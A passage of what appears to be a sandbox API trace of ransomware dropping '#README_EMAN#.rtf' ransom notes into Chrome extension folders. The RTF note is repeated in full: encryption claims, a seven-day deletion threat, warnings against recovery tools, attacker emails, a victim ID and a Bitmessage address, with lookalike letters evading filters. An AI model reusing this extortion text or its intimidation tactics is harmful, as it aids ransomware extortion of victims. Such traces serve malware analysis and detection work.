g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.128] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.128] CloseHandle (hObject=0x294) returned 1 [0285.128] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\#readme_eman#.rtf")) returned 0xffffffff [0285.128] GetLastError () returned 0x2 [0285.129] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.130] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.130] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.130] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 